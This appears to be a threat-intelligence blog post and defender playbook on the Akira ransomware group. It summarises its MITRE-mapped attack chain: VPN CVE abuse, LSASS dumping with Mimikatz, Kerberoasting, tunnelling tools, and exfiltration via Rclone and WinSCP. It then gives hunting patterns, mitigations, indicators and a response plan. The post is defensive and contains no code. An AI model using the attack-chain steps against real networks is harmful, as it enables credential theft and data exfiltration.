Cyberdudebivash

Akira Ransomware — Threat Analysis & Defender Playbook Prepared by CyberDudeBivash Threat Intelligence

Executive summary

Akira is a prolific RaaS operation active since March 2023, impacting organizations across North America, Europe, and Australia. By Jan 1, 2024 it had hit 250+ organizations and amassed ≈$42M. Akira runs dual codebases: classic C++ (adds “.akira”) and a Rust line (“Megazord / Akira v2”) that can add “.powerranges” and targets VMware ESXi/Linux as well as Windows. CISA

In 2025, activity continues with reports of MSP-focused campaigns and suspected VPN appliance abuse (e.g., SonicWall incidents under investigation). Treat edge/VPN as highest risk. IT ProTechRadar

Attack chain (MITRE-mapped highlights)

Initial access — TA0001

  • VPNs without MFA; frequent focus on Cisco ASA/FTD via CVE-2023-20269 (credential brute-force to clientless SSL VPN) and CVE-2020-3259 (memory disclosure → creds). Also RDP, spear-phishing, valid creds. KrollTruesecCisco BlogsCISA

Discovery / Privilege escalation — TA0007/TA0004

  • Create new domain accounts (observed itadm), Kerberoasting, dump LSASS (Mimikatz/LaZagne), scan with SoftPerfect/Advanced IP ScannerCISA

C2 / Staging — TA0011

  • Remote admin/tunneling tools: AnyDesk, RustDesk, MobaXterm, Ngrok, Cloudflare TunnelCISA

Exfiltration — TA0010

  • WinSCP, Rclone, FileZilla, archives with WinRAR, egress to MEGA/cloud buckets before encryption (double extortion). CISA

Impact — TA0040

  • Hybrid crypto (ChaCha20 + RSA); ransom note fn.txt; file extensions .akira or .powerranges; Tor portal with unique victim code; initial note often omits a dollar amount. CISA

2024–2025 evolution to watch

  • Rust/ESXi “v2” line appeared in early 2024; research shows ESXi-specific logic and additional extension .akiranew seen in the wild. Check Point Research
  • MSP targeting emphasized in recent threat intel; compromises of a service provider can cascade to downstream clients. IT Pro
  • SonicWall SSL-VPN incidents (mid-2025): investigations ongoing; harden/monitor even fully patched devices. TechRadar

Hunt & detect (quick wins you can deploy today)

Windows/AD

  • Alert on VSS deletion + mass file rename + fn.txt drops.
  • Detect new domain admin / account creations (look for odd admin names like itadm).
  • LSASS access + Kerberoast patterns; unsigned PowerShell staging. CISA

VPN/Edge

  • Look for clientless SSL-VPN sessions created without MFA; brute-force/spray to ASA/FTD; anomalous geography. Patch/monitor for CVE-2023-20269/CVE-2020-3259 indicators. Kroll

Exfil

  • Unusual WinSCP/Rclone/FileZilla from servers; egress to MEGA/SFTP; large outbound SSH after hours. CISA

ESXi/Linux

  • Sudden VM power-off waves; new SSH enablement; suspicious SFTP of encryptors to multiple hosts. (Rust/ESXi line). Check Point Research

Priority mitigations (that actually reduce risk)

  1. Patch the edge first: Cisco ASA/FTD (CVE-2023-20269, CVE-2020-3259), VPNs, ESXi, RDP gateways. KrollTruesec
  2. Phishing-resistant MFA (FIDO) on VPN/RDP; block or tightly allowlist RMM/tunneling tools. Kroll
  3. Harden identity: monitor new admin creation, enforce least privilege, rotate creds after VPN patching (memory disclosure risk). Truesec
  4. Exfil controls: DLP/outbound blocks for MEGA, restrict SFTP/SSH from non-admin segments; alert on Rclone/WinSCPCISA
  5. Resilience: offline/immutable backups; test restores; practice tabletop IR for double-extortion scenarios. CISA

Indicators & artifacts (use behavior > hashes)

  • Note/extension: fn.txt, “.akira”, “.powerranges” (and occasionally “.akiranew”). CISACheck Point Research
  • Tools often seen: AnyDesk/RustDesk/Ngrok/Cloudflare Tunnel; WinRAR + WinSCP/Rclone/FileZilla. CISA

Rapid response playbook (print-friendly)

  1. Contain: isolate edge/VPN device, disable clientless SSL-VPN, block suspicious RMM, lock new admin accounts.
  2. Preserve: collect ASA/FTD logs, VPN/RADIUS, AD, EDR, ESXi logs; snapshot affected VMs.
  3. Hunt: search for fn.txt.akira|.powerranges, VSS deletions, ASA brute-force, Rclone/WinSCP beacons.
  4. Eradicate: patch ASA/FTD/ESXi; rotate creds (assume disclosure if CVE-2020-3259 window existed); remove persistence.
  5. Recover & notify: restore from clean backups; execute breach notifications per sector laws; report to FBI/IC3/CISACISA

Sources / recommended reading

  • CISA/FBI/EC3/NCSC-NL #StopRansomware: Akira — TTPs, IOCs, mitigations, statistics. CISA
  • Check Point Research — deep dive on the Rust/ESXi (“v2”) line. Check Point Research
  • Cisco — Akira campaigns against VPNs without MFACisco Blogs
  • Truesec — analysis of CVE-2020-3259 memory-leak abuse by Akira. Truesec
  • Kroll — ASA/FTD focus, toolset during intrusions. Kroll

#CyberDudeBivash #Akira #Ransomware #RaaS #DoubleExtortion #ESXi #VPNSecurity #CISA #MITREATTACK #DFIR #XDR #ThreatIntel #IncidentResponse

Leave a comment

Design a site like this with WordPress.com
Get started